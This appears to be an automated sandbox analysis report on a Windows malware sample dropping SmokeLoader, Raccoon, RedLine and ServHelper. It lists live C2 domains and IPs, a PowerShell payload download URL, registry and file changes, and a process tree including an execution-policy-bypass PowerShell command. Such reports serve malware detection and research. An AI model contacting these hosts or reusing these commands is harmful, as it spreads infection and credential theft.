Analysis
-
max time kernel
152s -
max time network
151s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
12-10-2021 13:26
Static task
static1
Behavioral task
behavioral1
Sample
6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe
Resource
win10v20210408
General
-
Target
6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe
-
Size
175KB
-
MD5
75c57c36ea55cae6e61d3de271003217
-
SHA1
999f8eeefdbefa74f9cf14e7447ddace4b04e293
-
SHA256
6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf
-
SHA512
cdf331578a6016371e7b2fd3b2cb96abbd0537a6288c326e41acd8b3308a706ba1a2f78bee6067ed0094f789493e8ac9f783979151f6d49880e185af8f6f7e89
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://linavanandr11.club/
http://iselaharty12.club/
http://giovaninardo13.club/
http://zayneliann14.club/
http://zorinosali15.club/
Extracted
raccoon
1.8.2
27d80aa27e80cd2ef63c638e2752e24242d1b37c
-
url4cnc
http://telemirror.top/ararius809b
http://tgmirror.top/ararius809b
http://telegatt.top/ararius809b
http://telegka.top/ararius809b
http://telegin.top/ararius809b
https://t.me/ararius809b
Extracted
redline
w1
109.234.34.165:12323
Extracted
redline
MegaProliv
93.115.20.139:28978
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral1/memory/2820-143-0x0000000000780000-0x00000000007B1000-memory.dmp family_redline behavioral1/memory/2820-148-0x0000000000870000-0x000000000088C000-memory.dmp family_redline behavioral1/memory/2884-211-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/2884-212-0x000000000041B25E-mapping.dmp family_redline behavioral1/memory/2884-221-0x0000000004D40000-0x0000000005346000-memory.dmp family_redline -
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 2888 created 1852 2888 WerFault.exe 77 -
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
flow pid Process 61 2124 powershell.exe 63 2124 powershell.exe 64 2124 powershell.exe 65 2124 powershell.exe 67 2124 powershell.exe 69 2124 powershell.exe 71 2124 powershell.exe 74 2124 powershell.exe 76 2124 powershell.exe -
Executes dropped EXE 8 IoCs
pid Process 1676 C5E6.exe 1852 CC4F.exe 2820 D2B9.exe 3168 DE05.exe 3196 E44F.exe 2884 E44F.exe 2968 cbtfvtu 3808 cbtfvtu -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
resource yara_rule behavioral1/files/0x000800000001ab49-904.dat upx behavioral1/files/0x000400000001524e-938.dat upx -
resource yara_rule behavioral1/files/0x000500000001ab3e-120.dat vmprotect behavioral1/files/0x000500000001ab3e-121.dat vmprotect behavioral1/memory/1676-122-0x0000000000360000-0x00000000011A6000-memory.dmp vmprotect -
Deletes itself 1 IoCs
pid Process 2224 Process not Found -
Loads dropped DLL 2 IoCs
pid Process 3204 Process not Found 3204 Process not Found -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 504 set thread context of 2708 504 6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe 72 PID 3196 set thread context of 2884 3196 E44F.exe 85 PID 2968 set thread context of 3808 2968 cbtfvtu 170 -
Drops file in Program Files directory 4 IoCs
description ioc Process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 24 IoCs
description ioc Process File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6DAF.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6E30.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_55g1aaie.muo.psm1 powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_x0q1l5pa.atm.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6E0F.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6E1F.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6DFE.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 2888 1852 WerFault.exe 77 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cbtfvtu Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cbtfvtu Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cbtfvtu -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 3408 reg.exe 3988 reg.exe -
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 67 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 63 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 64 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 65 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2708 6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe 2708 6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2224 Process not Found -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 620 Process not Found 620 Process not Found 620 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 2708 6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe 3808 cbtfvtu -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2224 Process not Found Token: SeCreatePagefilePrivilege 2224 Process not Found Token: SeShutdownPrivilege 2224 Process not Found Token: SeCreatePagefilePrivilege 2224 Process not Found Token: SeShutdownPrivilege 2224 Process not Found Token: SeCreatePagefilePrivilege 2224 Process not Found Token: SeDebugPrivilege 1840 powershell.exe Token: SeShutdownPrivilege 2224 Process not Found Token: SeCreatePagefilePrivilege 2224 Process not Found Token: SeShutdownPrivilege 2224 Process not Found Token: SeCreatePagefilePrivilege 2224 Process not Found Token: SeShutdownPrivilege 2224 Process not Found Token: SeCreatePagefilePrivilege 2224 Process not Found Token: SeDebugPrivilege 2820 D2B9.exe Token: SeDebugPrivilege 1616 powershell.exe Token: SeDebugPrivilege 816 powershell.exe Token: SeDebugPrivilege 2884 E44F.exe Token: SeShutdownPrivilege 2224 Process not Found Token: SeCreatePagefilePrivilege 2224 Process not Found Token: SeShutdownPrivilege 2224 Process not Found Token: SeCreatePagefilePrivilege 2224 Process not Found Token: SeShutdownPrivilege 2224 Process not Found Token: SeCreatePagefilePrivilege 2224 Process not Found Token: SeIncreaseQuotaPrivilege 1616 powershell.exe Token: SeSecurityPrivilege 1616 powershell.exe Token: SeTakeOwnershipPrivilege 1616 powershell.exe Token: SeLoadDriverPrivilege 1616 powershell.exe Token: SeSystemProfilePrivilege 1616 powershell.exe Token: SeSystemtimePrivilege 1616 powershell.exe Token: SeProfSingleProcessPrivilege 1616 powershell.exe Token: SeIncBasePriorityPrivilege 1616 powershell.exe Token: SeCreatePagefilePrivilege 1616 powershell.exe Token: SeBackupPrivilege 1616 powershell.exe Token: SeRestorePrivilege 1616 powershell.exe Token: SeShutdownPrivilege 1616 powershell.exe Token: SeDebugPrivilege 1616 powershell.exe Token: SeSystemEnvironmentPrivilege 1616 powershell.exe Token: SeRemoteShutdownPrivilege 1616 powershell.exe Token: SeUndockPrivilege 1616 powershell.exe Token: SeManageVolumePrivilege 1616 powershell.exe Token: 33 1616 powershell.exe Token: 34 1616 powershell.exe Token: 35 1616 powershell.exe Token: 36 1616 powershell.exe Token: SeDebugPrivilege 3576 powershell.exe Token: SeDebugPrivilege 3268 powershell.exe Token: SeIncreaseQuotaPrivilege 3576 powershell.exe Token: SeSecurityPrivilege 3576 powershell.exe Token: SeTakeOwnershipPrivilege 3576 powershell.exe Token: SeLoadDriverPrivilege 3576 powershell.exe Token: SeSystemProfilePrivilege 3576 powershell.exe Token: SeSystemtimePrivilege 3576 powershell.exe Token: SeProfSingleProcessPrivilege 3576 powershell.exe Token: SeIncBasePriorityPrivilege 3576 powershell.exe Token: SeCreatePagefilePrivilege 3576 powershell.exe Token: SeBackupPrivilege 3576 powershell.exe Token: SeRestorePrivilege 3576 powershell.exe Token: SeShutdownPrivilege 3576 powershell.exe Token: SeDebugPrivilege 3576 powershell.exe Token: SeSystemEnvironmentPrivilege 3576 powershell.exe Token: SeRemoteShutdownPrivilege 3576 powershell.exe Token: SeUndockPrivilege 3576 powershell.exe Token: SeManageVolumePrivilege 3576 powershell.exe Token: 33 3576 powershell.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found 2224 Process not Found -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 2224 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 504 wrote to memory of 2708 504 6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe 72 PID 504 wrote to memory of 2708 504 6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe 72 PID 504 wrote to memory of 2708 504 6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe 72 PID 504 wrote to memory of 2708 504 6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe 72 PID 504 wrote to memory of 2708 504 6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe 72 PID 504 wrote to memory of 2708 504 6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe 72 PID 2224 wrote to memory of 1676 2224 Process not Found 76 PID 2224 wrote to memory of 1676 2224 Process not Found 76 PID 2224 wrote to memory of 1852 2224 Process not Found 77 PID 2224 wrote to memory of 1852 2224 Process not Found 77 PID 2224 wrote to memory of 1852 2224 Process not Found 77 PID 2224 wrote to memory of 2820 2224 Process not Found 78 PID 2224 wrote to memory of 2820 2224 Process not Found 78 PID 2224 wrote to memory of 2820 2224 Process not Found 78 PID 2224 wrote to memory of 3168 2224 Process not Found 80 PID 2224 wrote to memory of 3168 2224 Process not Found 80 PID 2224 wrote to memory of 3168 2224 Process not Found 80 PID 2224 wrote to memory of 3196 2224 Process not Found 81 PID 2224 wrote to memory of 3196 2224 Process not Found 81 PID 2224 wrote to memory of 3196 2224 Process not Found 81 PID 1676 wrote to memory of 1840 1676 C5E6.exe 83 PID 1676 wrote to memory of 1840 1676 C5E6.exe 83 PID 3196 wrote to memory of 2884 3196 E44F.exe 85 PID 3196 wrote to memory of 2884 3196 E44F.exe 85 PID 3196 wrote to memory of 2884 3196 E44F.exe 85 PID 1840 wrote to memory of 1940 1840 powershell.exe 86 PID 1840 wrote to memory of 1940 1840 powershell.exe 86 PID 1940 wrote to memory of 2580 1940 csc.exe 87 PID 1940 wrote to memory of 2580 1940 csc.exe 87 PID 3196 wrote to memory of 2884 3196 E44F.exe 85 PID 3196 wrote to memory of 2884 3196 E44F.exe 85 PID 3196 wrote to memory of 2884 3196 E44F.exe 85 PID 3196 wrote to memory of 2884 3196 E44F.exe 85 PID 3196 wrote to memory of 2884 3196 E44F.exe 85 PID 3168 wrote to memory of 816 3168 DE05.exe 88 PID 3168 wrote to memory of 816 3168 DE05.exe 88 PID 3168 wrote to memory of 816 3168 DE05.exe 88 PID 1840 wrote to memory of 1616 1840 powershell.exe 90 PID 1840 wrote to memory of 1616 1840 powershell.exe 90 PID 816 wrote to memory of 3460 816 powershell.exe 92 PID 816 wrote to memory of 3460 816 powershell.exe 92 PID 816 wrote to memory of 3460 816 powershell.exe 92 PID 3460 wrote to memory of 3604 3460 csc.exe 93 PID 3460 wrote to memory of 3604 3460 csc.exe 93 PID 3460 wrote to memory of 3604 3460 csc.exe 93 PID 1840 wrote to memory of 3576 1840 powershell.exe 95 PID 1840 wrote to memory of 3576 1840 powershell.exe 95 PID 816 wrote to memory of 3268 816 powershell.exe 97 PID 816 wrote to memory of 3268 816 powershell.exe 97 PID 816 wrote to memory of 3268 816 powershell.exe 97 PID 1840 wrote to memory of 2568 1840 powershell.exe 99 PID 1840 wrote to memory of 2568 1840 powershell.exe 99 PID 816 wrote to memory of 3548 816 powershell.exe 101 PID 816 wrote to memory of 3548 816 powershell.exe 101 PID 816 wrote to memory of 3548 816 powershell.exe 101 PID 1840 wrote to memory of 960 1840 powershell.exe 103 PID 1840 wrote to memory of 960 1840 powershell.exe 103 PID 1840 wrote to memory of 3408 1840 powershell.exe 104 PID 1840 wrote to memory of 3408 1840 powershell.exe 104 PID 1840 wrote to memory of 3236 1840 powershell.exe 105 PID 1840 wrote to memory of 3236 1840 powershell.exe 105 PID 1840 wrote to memory of 2884 1840 powershell.exe 106 PID 1840 wrote to memory of 2884 1840 powershell.exe 106 PID 2884 wrote to memory of 1912 2884 net.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe"C:\Users\Admin\AppData\Local\Temp\6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:504 -
C:\Users\Admin\AppData\Local\Temp\6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe"C:\Users\Admin\AppData\Local\Temp\6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2708
-
-
C:\Users\Admin\AppData\Local\Temp\C5E6.exeC:\Users\Admin\AppData\Local\Temp\C5E6.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4ypmd11p\4ypmd11p.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF245.tmp" "c:\Users\Admin\AppData\Local\Temp\4ypmd11p\CSC8FA6497565B24962A0C859D862A90E.TMP"4⤵PID:2580
-
-
-
